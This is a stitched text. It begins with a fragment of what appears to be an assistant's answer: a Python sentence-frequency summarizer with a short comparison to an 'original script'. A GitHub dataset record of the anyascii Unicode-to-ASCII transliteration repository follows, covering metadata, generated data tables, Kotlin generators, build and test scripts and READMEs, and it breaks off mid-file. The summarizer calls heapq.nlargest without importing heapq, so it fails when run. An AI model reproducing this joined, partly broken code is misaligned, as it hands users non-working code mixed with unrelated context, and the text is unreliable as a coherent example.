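import re

STOPWORDS = {'the', 'a', 'of', 'and', 'is', 'to', 'in', 'from'}  # stand-in for the nltk stopword list

def summarize(sentences, top_n=2):
    # Count every non-stopword token across the whole text.
    freq = {}
    for sentence in sentences:
        for word in re.findall(r'[a-z]+', sentence.lower()):
            if word not in STOPWORDS:
                freq[word] = freq.get(word, 0) + 1
    # Normalize by the most frequent word, as the original script does.
    peak = max(freq.values(), default=1)
    freq = {word: count / peak for word, count in freq.items()}
    # Score each sentence by the sum of its words' weighted frequencies.
    scores = {}
    for sentence in sentences:
        for word in re.findall(r'[a-z]+', sentence.lower()):
            scores[sentence] = scores.get(sentence, 0) + freq.get(word, 0)
    # Keep the highest-scoring sentences, like heapq.nlargest(5, ...) above.
    return heapq.nlargest(top_n, scores, key=scores.get)

print(summarize([
    'Tea is a popular drink.',
    'Tea is made from tea leaves.',
    'Some people prefer coffee instead.',
]))
```

One difference worth noting: this sketch lowercases tokens both when counting and when scoring, whereas the original builds its frequency table from unlowercased tokens but scores lowercased ones, so capitalized words never contribute to sentence scores there.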
casept/anyascii
https://github.com/casept/anyascii
c27261d87257c17c47fe0e9fc77438437de94c1c
d4f426b91751254b68eaa84c6cd23099edd668e6
5e0755091efd2d4ed61bead8aa38b45bab5a8b07
refs/heads/master
2022-12-05T07:13:53.075144
2020-08-07T07:55:50
2020-08-07T07:55:50
285,904,577
0
0
ISC
2020-08-07T19:19:59
2020-08-07T19:19:52
2020-08-07T09:42:30
null
[ { "alpha_fraction": 0.35185185074806213, "alphanum_fraction": 0.3888888955116272, "avg_line_length": 54, "blob_id": "0d7749fe50edee941822ddb4282bb5f693683ceb", "content_id": "46352ebf96f85b4033f78fc28e0681bfa55bd6da", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 54, "license_type": "permissive", "max_line_length": 54, "num_lines": 1, "path": "/ruby/lib/data/2d0.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2d0 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLi'.split '\t' end" }, { "alpha_fraction": 0.4984709620475769, "alphanum_fraction": 0.538226306438446, "avg_line_length": 22.35714340209961, "blob_id": "be575cbad212111e8391f0ff953b6a7f9f2ba5e9", "content_id": "3db6b6430bdf3254c112a917092e80f79a5a2169", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 327, "license_type": "permissive", "max_line_length": 69, "num_lines": 14, "path": "/src/main/resources/com/anyascii/build/gen/body.sh", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "output=\nfor cp in $(printf %s \"$*\" | iconv -f utf8 -t utf32le | od -A n -t u)\ndo\n\tif test \"$cp\" -lt 128\n\tthen\n\t\ts=$(printf \"\\\\$(printf %o \"$cp\")\")\n\telse\n\t\tblock_num=$(printf %03x $((cp >> 8)))\n\t\teval \"block=\\$_$block_num\"\n\t\ts=$(printf %s \"$block\" | cut -f$(((cp & 255) + 1)))\n\tfi\n\toutput=$output$s\ndone\nprintf '%s\\n' \"$output\"\n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 75, "blob_id": "735da2d6c5ba105d448828a7c2b5399fc3fc8a3f", "content_id": "da10a5506a21c8c21d48f86c95cabaffba5fbbdd", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "permissive", "max_line_length": 75, "num_lines": 1, "path": "/js/data/2e4.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing'.split('\t')" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 12, "blob_id": "c68d7363e7dd85ba88c728f73eae5f9cd396473b", "content_id": "5a2d58b09b39cf68fb845d42306415629015a12c", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 39, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/go/go.mod", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module github.com/anyascii/go\n\ngo 1.12\n" }, { "alpha_fraction": 0.6022727489471436, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 13.833333015441895, "blob_id": "4c5a1bfd444407c45d82902adaaaa40c9783d6d2", "content_id": "8bb6034edc9b956932c7d052f0dc99d4cbb34750", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 88, "license_type": "permissive", "max_line_length": 39, "num_lines": 6, "path": "/python/tox.ini", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py39,py38,py37,py36,py35,py34\n\n[testenv]\ndeps = pytest\ncommands = pytest" }, { "alpha_fraction": 0.30263158679008484, "alphanum_fraction": 0.30263158679008484, "avg_line_length": 76, "blob_id": "41b585ac35b7a1feac94f6425b1e8428dc58760b", "content_id": "9a78734f34aa3df3838f69cf04c04de32869e237", "detected_licenses": [ "ISC" ], "is_generated": false, 
"is_vendor": false, "language": "PHP", "length_bytes": 76, "license_type": "permissive", "max_line_length": 76, "num_lines": 1, "path": "/php/_data/_2e4.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing');" }, { "alpha_fraction": 0.6686102747917175, "alphanum_fraction": 0.6744412183761597, "avg_line_length": 48.0476188659668, "blob_id": "15b509d434b5450d3598fb8ab7e477ffcbf0680c", "content_id": "ae3f0ca8343413723b131470e075a1bc8ace3dfd", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 92, "num_lines": 21, "path": "/ruby/any_ascii.gemspec", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "Gem::Specification.new do |s|\n s.name = 'any_ascii'\n s.version = '0.1.7-dev'\n s.summary = 'Unicode to ASCII transliteration'\n s.description =\n 'Unicode to ASCII transliteration.' +\n ' Converts Unicode text to a reasonable representation using only ASCII.' +\n ' For most characters in Unicode, AnyAscii provides an ASCII-only replacement string.' +\n ' Text is converted character-by-character without considering the context.' +\n ' The mappings for each script are based on popular existing romanization schemes.' +\n ' Symbolic characters are converted based on their meaning or appearance.' +\n ' All ASCII characters in the input are left unchanged,' +\n ' every other character is replaced with printable ASCII characters.' +\n ' Unknown characters are removed.'\n s.authors = ['Hunter WB']\n s.email = '[email protected]'\n s.files = Dir.glob 'lib/**/*.rb'\n s.homepage = 'https://github.com/anyascii/anyascii'\n s.license = 'ISC'\n s.required_ruby_version = '>= 2.0.0'\nend" }, { "alpha_fraction": 0.5498489141464233, "alphanum_fraction": 0.5528700947761536, "avg_line_length": 34.5, "blob_id": "bd95e62bd6cc386d9e5e74bae4d24d3fc842fef5", "content_id": "ae56b4c197c6b3463f77ccd198f9ab5abb88dcec", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 993, "license_type": "permissive", "max_line_length": 125, "num_lines": 28, "path": "/src/main/java/com/anyascii/build/gen/CSharp.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun cSharp(g: Generator) {\n Files.newBufferedWriter(Path.of(\"csharp/src/Transliteration.blocks.cs\")).use { w ->\n w.write(\"using System.Collections.Generic;\\n\")\n w.write(\"using System;\\n\\n\")\n w.write(\"namespace AnyAscii\\n\")\n w.write(\"{\\n\")\n w.write(\"\\tpublic static partial class Transliteration\\n\")\n w.write(\"\\t{\\n\")\n w.write(\"\\t\\tprivate static readonly Dictionary<int, Lazy<string[]>> blocks = new Dictionary<int, Lazy<string[]>>\\n\")\n w.write(\"\\t\\t{\\n\")\n\n for ((blockNum, block) in g.blocks) {\n val h = \"%03x\".format(blockNum)\n w.write(\"\\t\\t\\t{ 0x$h, new Lazy<string[]>(() => new[] { ${block.joinToString { escape(it) } } }) },\\n\")\n }\n\n w.write(\"\\t\\t};\\n\")\n w.write(\"\\t}\\n\")\n w.write(\"}\\n\")\n }\n}\n\nprivate fun escape(s: String) = '\"' + s.replace(\"\\\\\", \"\\\\\\\\\").replace(\"\\\"\", \"\\\\\\\"\") + '\"'" }, { "alpha_fraction": 0.31168830394744873, "alphanum_fraction": 0.33766233921051025, "avg_line_length": 77, "blob_id": "fd46ead884fca248398dd517df349c4a17155d3a", "content_id": 
"21b7c3c11ea741e21a574195a4b8e12a90097f3e", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 77, "license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/ruby/lib/data/2e4.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2e4 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing'.split '\t' end" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.6891891956329346, "avg_line_length": 17.5, "blob_id": "0147b0ca96d6311d29b8f64e24a9a1913a4b51d7", "content_id": "c991aaca0eb1451dc864d252896e2d34ae3d4feb", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "permissive", "max_line_length": 50, "num_lines": 8, "path": "/go/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "```go\nimport \"github.com/anyascii/go\"\n\ns := anyascii.Transliterate(\"άνθρωποι\")\n// anthropoi\n```\n\n[**README**](https://github.com/anyascii/anyascii)\n" }, { "alpha_fraction": 0.5664195418357849, "alphanum_fraction": 0.5866559743881226, "avg_line_length": 28.358823776245117, "blob_id": "18f046aa3cf633aabd3c6a31bbde94b58994cffc", "content_id": "a48e9089dfd3263abd6e51a8cffe0f33bba89573", "detected_licenses": [ "GPL-1.0-or-later", "Artistic-1.0-Perl", "ISC" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 5045, "license_type": "permissive", "max_line_length": 74, "num_lines": 170, "path": "/unidecode/src/TODO.txt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "# -*-coding:utf-8;-*- ··················································\n# Last Modified Time-stamp: \"2015-10-16 03:34:44 MDT [email protected]\"\n#======================================================================\n\n\t ~~ Text::Unidecode TODO file ~~\n\nTODO: make the table files be built from the Unicode character\ndatabase, transitioning from the values in the current table files.\nI used to have a whole bunch of concise files that compiled to\nthe xXX.pm table files. But they're in a file format I\nhaven't dealt with since 2001, so screw it all, I'm starting\nfrom zero and it will be... well, you'll see.\n\n(Presumably the Hangul and the Unihan blocks are outside the\nscope of that whole ruckus of named characters.)\n\n\nTODO GTD:\nKeep plugging in suggestions from Tomaž Šolc's message\n\n\nTODO:\nFigure out how to courteously declare dependencies in my Makefile.PL\n\nTODO:\nBundle with a \"unidecode\" util that calls a routine in Unidecode.pm?\nOr maybe just show it as a one-liner in the POD?\n\nTODO:\nAlso show it with an example use with iconv\n\nTODO:\nPlow through more bug reports, applying patches etc,\nespecially stuff from that nice Tomaž Šolc man.\n\nTODO:\n\n***DEFINITELY*** Make it handle stuff in Astral Plane (over U+FFFF)\nTake that plunge, or ascend into the plane, or whatever. DOIT.\n\nTODO:\n\nCurrently, all the files are in Unix newline format (LF).\nMaybe CR+LF is technically more universal, and I could switch\nto that. But so far I've gotten no complaints that I should\ngo do that.\n\nTODO:\n\nTHEN re-run the thing that reads the Unihan database and generates\nall the Text/Unidecode/__.pm files.\n(Do the hyperspace handling first, because lots of Unihan\nstuff is up there.)\n\nTODO:\n\nLook to see whether I need to deal with the Arabic stuff in\nthe U+FBxx etc blocks. 
I thought it was always just\nfont-internal stuff, but I'm starting to suspect that it may\nbe encountered in the real world\n\nTODO:\n\nOf course:\n- Check for new glyphs in existing tables.\n- Look at whole new tables (like the Philippine scripts) in\nnormal space (x < U+FFFF)\n- Look at the wild wilderness in hyperspace (x > U+FFFF\n\n\n======================================================================\n======================================================================\n\n########################################################################\nBelow here is TODOs from the Unicode version in 2001. Yes, that long ago.\n\n\n============================== BLOCK 09 ==============================\n\nWhat's an isshar? (09FA = \"bengali isshar\")\n\n\n============================== BLOCK 0b ==============================\n\nWhat's an isshar? (0B70 = \"oriya isshar\")\n\n\n============================== BLOCK 0e ==============================\n\nWhat is 0E4C = \"thai character thanthakhat\" ?\n\nWhat is 0E4E = \"thai character yamakkan\" ?\n\n\n============================== BLOCK 0f ==============================\n\nVarious questions to do with Tibetan (0f00-0fff)...\n\nA lot of these characters end up as \"\". What to do with them?\n\nHow to represent these Astrological signs, 0F15-0F1F ?\n\nWhat is a 0F38 = \"Tibetan mark Che Mgo\" ?\n\nShould I leave \"Marks and Signs\" (0F82-0F87) as \"\"?\n\nWhat to do with \"Transliteration head letters\" (0F88-0F8B) ?\n\n\n============================== BLOCK 11 ==============================\n\nVarious Hangul components need checking:\n\nWhat are chitueumsios, chitueumssangsios,\nceongchieumsios, and ceongchieumssangsios?\n\nIs \"Z\" a good transliteration for pansios?\n\nI'm using \"N\" for yesieung and kapyeoun both. Is this right?\n\nWhat are chitueumcieuc, chitueumssangcieuc, ceongchieumcieuc,\nceongchieumssangcieuc, chitueumchieuch, and ceongchieumchieuch?\n\nIs \"kapyeounphieuph\" best transliterated as \"Np\" or \"pN\"?,\nand so on for: kapyeounrieul, kapyeounmieum, kapyeounpieup,\nkapyeounssangpieup, kapyeounphieuph\n\nI'm using \"Q\" for yeorinhieuh, apparently an archaic glottal\nstop character. Is that right?\n\n\n============================== BLOCK 14 ==============================\n\nHow to transliterate 0x1426,\nAKA \"canadian syllabics final double short vertical strokes\"?\n\nHow to transliterate 0x1429, AKA \"canadian syllabics final plus\"?\n\n\n============================== BLOCK 16 ==============================\n\nFact-check the Ogham and Runes.\n\nWhat are eabhadh, or, uilleann, ifin, eamhancholl, and peith (1695-169A)?\n\n\n============================== BLOCK 18 ==============================\n\nWhat's 180A = \"Mongolian nirugu\" ?\n\n\n============================== BLOCK 31 ==============================\n\nI leave the Kaeriten (3190-319F) as null-string. 
Is that good?\n\n\n============================== BLOCK fb ==============================\n\nArabic Presentation Forms-A (FB50-FDFF) -- do I need to\ndo these, or are they never actually found in text files?\n\n\n============================== BLOCK fe ==============================\n\nArabic Presentation Forms-B (FE70-FEFF) -- do I need to\ndo these, or are they never actually found in text files?\n\n\n======================================================================\n(end)\n" }, { "alpha_fraction": 0.3181818127632141, "alphanum_fraction": 0.3181818127632141, "avg_line_length": 88, "blob_id": "73567fa33dc838419037252167e4fc5e5594f881", "content_id": "22acab3f5cc768a89f22a2e3f3cb287eece66f57", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 88, "license_type": "permissive", "max_line_length": 88, "num_lines": 1, "path": "/js/data/2e0.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng'.split('\t')" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 18.66666603088379, "blob_id": "194d0316e617d4dfd660e0a7991cbfbbf46e6259", "content_id": "fe191be0234543330c340078a879c0a6f01e883d", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "permissive", "max_line_length": 50, "num_lines": 6, "path": "/php/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "```php\n$s = AnyAscii::transliterate('άνθρωποι');\n// anthropoi\n```\n\n[**README**](https://github.com/anyascii/anyascii)\n" }, { "alpha_fraction": 0.5629496574401855, "alphanum_fraction": 0.5755395889282227, "avg_line_length": 14.472222328186035, "blob_id": "0fa1e27ae2cc62636960df93289313e012446620", "content_id": "3d45eff186e8ee89a0c431da2d2581ff900b9484", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 556, "license_type": "permissive", "max_line_length": 35, "num_lines": 36, "path": "/ruby/lib/any_ascii.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module AnyAscii\n\n\tBLOCKS = Hash.new { |h, k|\n\t\ts = '%03x' % k\n\t\tbegin\n\t\t\trequire_relative \"data/#{s}.rb\"\n\t\trescue LoadError\n\t\t\tb = []\n\t\telse\n\t\t\tb = Object.const_get(\"X#{s}\")::B\n\t\tend\n\t\th[k] = b\n\t}\n\n\tprivate_constant :BLOCKS\n\n\tdef self.transliterate(string)\n\t\tif string.ascii_only?\n\t\t\treturn string\n\t\tend\n\t\tresult = ''\n\t\tstring.each_codepoint { |cp|\n\t\t\tif cp <= 127\n\t\t\t\tresult << cp\n\t\t\telse\n\t\t\t\tblock_num = cp >> 8\n\t\t\t\tlo = cp & 0xFF\n\t\t\t\tblock = BLOCKS[block_num]\n\t\t\t\tif block.length > lo\n\t\t\t\t\tresult << block[lo]\n\t\t\t\tend\n\t\t\tend\n\t\t}\n\t\treturn result\n\tend\nend" }, { "alpha_fraction": 0.6511628031730652, "alphanum_fraction": 0.6511628031730652, "avg_line_length": 16.91666603088379, "blob_id": "ac70b5616b277d643bba0489eaecd6dc8f521cd1", "content_id": "9ba705f7a38fe0a04ea193024a5043a2afe92c2a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 215, "license_type": "permissive", "max_line_length": 37, "num_lines": 12, "path": "/test.sh", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eux\n\nnpm test\ngo test ./go\nruby 
ruby/lib/any_ascii_test.rb\ncd rust && cargo test && cd -\ncd python && python -m pytest && cd -\ncd java && ./mvnw test && cd -\ndotnet test csharp/test\nphp php/test.php\n" }, { "alpha_fraction": 0.4761904776096344, "alphanum_fraction": 0.5, "avg_line_length": 42, "blob_id": "97d97e58cd7d90e787d2657dbbc7085b8e85af76", "content_id": "750f669192ffbc1850d8f33c737638111ca15752", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 42, "license_type": "permissive", "max_line_length": 42, "num_lines": 1, "path": "/ruby/lib/data/2dd.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2dd B='\t\t\t\t\t\t\t\t\t\tWu'.split '\t' end" }, { "alpha_fraction": 0.30000001192092896, "alphanum_fraction": 0.3222222328186035, "avg_line_length": 90, "blob_id": "38267c4fbd44dc28f26a7f5f4d3b529fb92fa235", "content_id": "35f0ac1bfe6c1d82e4b726e20ca59e47b03be15a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 90, "license_type": "permissive", "max_line_length": 90, "num_lines": 1, "path": "/ruby/lib/data/2e0.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2e0 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng'.split '\t' end" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.591911792755127, "avg_line_length": 29.27777862548828, "blob_id": "ef95ea5ebed66235150477bb287ee642f9170c84", "content_id": "1be7eae77422e974d3b76b6040520baac8c5568a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 544, "license_type": "permissive", "max_line_length": 86, "num_lines": 18, "path": "/src/main/java/com/anyascii/build/gen/Ruby.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun ruby(g: Generator) {\n val dirPath = Path.of(\"ruby/lib/data\")\n dirPath.toFile().deleteRecursively()\n Files.createDirectories(dirPath)\n\n for ((blockNum, block) in g.blocks) {\n val b = \"%03x\".format(blockNum)\n Files.newBufferedWriter(dirPath.resolve(\"$b.rb\")).use { w ->\n val s = block.joinToString(\"\\t\").replace(\"\\\\\", \"\\\\\\\\\").replace(\"'\", \"\\\\'\")\n w.write(\"module X$b B='$s'.split '\\t' end\")\n }\n }\n}" }, { "alpha_fraction": 0.6799628734588623, "alphanum_fraction": 0.6934137344360352, "avg_line_length": 42.099998474121094, "blob_id": "79aae8a0955e156be5e9c6e576bf05fc1e2d1892", "content_id": "773f1d63100383551e8152b1c034ea74f8da3bd3", "detected_licenses": [ "GPL-1.0-or-later", "Artistic-1.0-Perl", "ISC" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 5268, "license_type": "permissive", "max_line_length": 133, "num_lines": 100, "path": "/unidecode/src/README", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "\t\t# -*- coding:utf-8; mode:Text; fill-column:79 -*-\n\t\t# Time-stamp: \"2016-07-24 03:12:31 MDT\"\n# (This page is in UTF-8!) |··················································|\n\nModule: Text::Unidecode-- make ASCII transliterations of Unicode text\n\nUnidecode makes ASCII transliterations of Unicode text. 
Sometimes it's dumb,\nbut it's better than looking at \"???\" or \"\\15BA\\15A0\\1610...\".\nIf you have smarter text-handling subroutines, Unidecode might be useful\nas a fallthrough for them.\n\nExample:\n print unidecode( \"北亰\\n\" );\n prints: Bei Jing\n\nSee more examples below.\n\nFor full documentation, run:\n perldoc Unidecode\nOr read:see:\n http://search.cpan.org/perldoc?Text::Unidecode \nAn article about how Unidecode runs:\n http://interglacial.com/tpj/22/\n\nREQUIREMENTS\nThis module requires Perl 5.8.0 at the very least. That's probably not a\nproblem for you, since that's from a decade ago!\n\nINSTALLATION\n* For using the \"CPAN Plus\" system, read: perldoc cpanp\n* For old-style \"make\" interface, read: perldoc perlmodinstall\n\n~~~ EXAMPLE UNIDECODE INPUT AND OUTPUT ~~~\n(Just two or three lines, from a few languages.)\n\nLa décennie voit le début des biotechnologies avec le premier clonage,\nles organismes génétiquement modifiés, le début du séquençage du\ngénome humain\n=> La decennie voit le debut des biotechnologies avec le premier clonage,\n les organismes genetiquement modifies, le debut du sequencage du\n genome humain\n\nWśród nocnej ciszy głos się rozchodzi:\nWstańcie, pasterze, Bóg się nam rodzi!\n=> Wsrod nocnej ciszy glos sie rozchodzi: \n Wstancie, pasterze, Bog sie nam rodzi! \n\nΚαθαίρονται δ᾽ ἄλλως αἵματι μιαινόμενοι οἷον εἴ τις εἰς πηλὸν ἐμβὰς\nπηλῷ ἀπονίζοντο. μαίνεσθαι δ᾽ ἂν δοκοίη, εἴ τίς μιν ἀνθρώπων\n=> Kathairontai d' allos aimati miainomenoi oion ei tis eis pelon embas\n pelo aponizonto. mainesthai d' an dokoie, ei tis min anthropon\n\nНа другой день к завтраку подавали очень вкусные пирожки, раков и\nбараньи котлеты; и пока ели, приходил наверх повар Никанор справиться,\n=> Na drughoi dien' k zavtraku podavali ochien' vkusnyie pirozhki, rakov i\n baran'i kotliety; i poka ieli, prikhodil navierkh povar Nikanor spravit'sia,\n\nNước trà (hay nước chè) là đồ uống phổ biến thứ hai trên thế giới (sau\nnước uống). Nó làm bằng cách ngâm lá, chồi, hay cành của cây chè\n=> Nuoc tra (hay nuoc che) la do uong pho bien thu hai tren the gioi (sau\n nuoc uong). No lam bang cach ngam la, choi, hay canh cua cay che\n\n#### And Then Things Get A Bit Suboptimal\n# But remember the Unidecode motto: \"It's better than nothing!\"\n\n유자차(柚子茶)는 유자청을 찬물이나 더운 물에 희석하여 마시는 한국의\n전통 차이다. 유자청은 얇게 자른 유자를 꿀이나 설탕과 섞은 뒤 3~4개월\n=> yujaca(You Zi Cha )neun yujaceongeul canmulina deoun mule hyiseoghayeo masineun hangugyi\n jeontong caida. yujaceongeun yalbge jareun yujareul ggulina seoltanggwa seoggeun dwi 3~4gaeweol\n\n* The Gayatri Mantra- Sanskrit\nॐ भूर्भुवः॒ स्वः । तत्स॑वितुर्वरे॑णियं ।\nभ॒र्गो॑ दे॒वस्य॑ धीमहि। । धियो॒ यो नः॑ प्रचो॒दया॑त्॥ । \n=> AUM bhuurbhuvH' svH / tts'viturvre'nniyN / \n bh'rgo' de'vsy' dhiimhi / / dhiyo' yo nH' prco'dyaa't // / \n\n道可道,非常道。名可名,非常名。無名天地之始;有名萬物之母。故常無欲,\n以觀其妙;常有欲,以觀其徼。此兩者,同出而異名,同謂之玄。玄之又玄,衆\n=> Dao Ke Dao ,Fei Chang Dao . Ming Ke Ming ,Fei Chang Ming . Wu Ming Tian Di Zhi Shi ;You Ming Wan Wu Zhi Mu . Gu Chang Wu Yu ,\n Yi Guan Qi Miao ;Chang You Yu ,Yi Guan Qi Jiao . Ci Liang Zhe ,Tong Chu Er Yi Ming ,Tong Wei Zhi Xuan . Xuan Zhi You Xuan ,Zhong \n\n#Yiddish. Directionality and ligature might come out wrong in your browser/editor:]\n‏טיי איז א געטראנק וואס מען טרינקט איבער דער גארער וועלט. טיי ווערט\nגעמאכט דורך ווייקן די געטרוקנטע בלעטער אדער בלומען פון דעם פלאנץ‎\n=> tyy yz g`trnq vvs m`n trynqt yb`r d`r gr`r vv`lt. tyy vv`rt\n g`mkt dvrk vvyyqn dy g`trvqnt` bl`t`r d`r blvm`n pvn d`m plnts\n\n\n#Urdu. 
Directionality and ligature might come out wrong in your browser/editor:]\n‏چائے دنیا کی پسندیدہ مشروب ہے۔ یہ چاۓ کے پودے کی پتیوں کو چند منٹ گرم\nپانی میں ابالنے سے تیار ہوتی ہے۔‎\n=> chy'y dny khy psndydh mshrwb hy. yh chy' khy pwdy khy ptywN khw chnd mntt grm\n pny myN blny sy tyr hwty hy.\n\n======================================================================\nEND OF README\n======================================================================\n{{{\nGenerated at Sat Nov 26 05:10:31 2016 (1480162231)\n}}}\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6081871390342712, "avg_line_length": 25.75, "blob_id": "42f44404ebb90085e8e1e6d4a8b780e4b844503c", "content_id": "a28b5a8175f7afbf4336374fea5ed39b68bec6d5", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "permissive", "max_line_length": 56, "num_lines": 32, "path": "/python/setup.py", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "import os\nimport setuptools\n\n\ndef read(fname):\n p = os.path.join(os.path.dirname(__file__), fname)\n if os.path.exists(p):\n return open(p, encoding='utf-8').read()\n else:\n return \"\"\n\n\nsetuptools.setup(\n author=\"Hunter WB\",\n author_email=\"[email protected]\",\n name='anyascii',\n version='0.1.7-dev',\n description='Unicode to ASCII transliteration',\n long_description=read('../README.md'),\n long_description_content_type='text/markdown',\n license='ISC',\n url='https://github.com/anyascii/anyascii',\n packages=setuptools.find_packages(),\n python_requires=\">=3.3\",\n zip_safe=True,\n classifiers=[\n 'License :: OSI Approved :: ISC License (ISCL)',\n 'Topic :: Text Processing :: General',\n 'Topic :: Text Processing :: Linguistic',\n 'Programming Language :: Python :: 3 :: Only',\n ]\n)" }, { "alpha_fraction": 0.47727271914482117, "alphanum_fraction": 0.4857954680919647, "avg_line_length": 25.074073791503906, "blob_id": "6786c627bdff1f9fb5a0278a7700c46bfc46f82b", "content_id": "0c03707741990f3219b02de69324395770771c07", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "permissive", "max_line_length": 78, "num_lines": 27, "path": "/python/anyascii/__init__.py", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "import importlib\n\n_blocks = {}\n\n\ndef anyascii(string):\n result = []\n for char in string:\n codepoint = ord(char)\n if codepoint <= 0x7f:\n result.append(char)\n continue\n blocknum = codepoint >> 8\n lo = codepoint & 0xff\n try:\n block = _blocks[blocknum]\n except KeyError:\n try:\n m = importlib.import_module('anyascii._data._%03x' % blocknum)\n block = tuple(m.b.split('\\t'))\n del m.b\n except ImportError:\n block = ()\n _blocks[blocknum] = block\n if len(block) > lo:\n result.append(block[lo])\n return ''.join(result)\n" }, { "alpha_fraction": 0.45330294966697693, "alphanum_fraction": 0.45558086037635803, "avg_line_length": 23.38888931274414, "blob_id": "bf033132be24d421b7b889c702b8081afe110342", "content_id": "029e647e3705e5735976e986f270a945be4c24d4", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 439, "license_type": "permissive", "max_line_length": 60, "num_lines": 18, "path": "/rust/src/main.rs", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "extern crate any_ascii;\nuse any_ascii::any_ascii;\n\nfn main() {\n let args = 
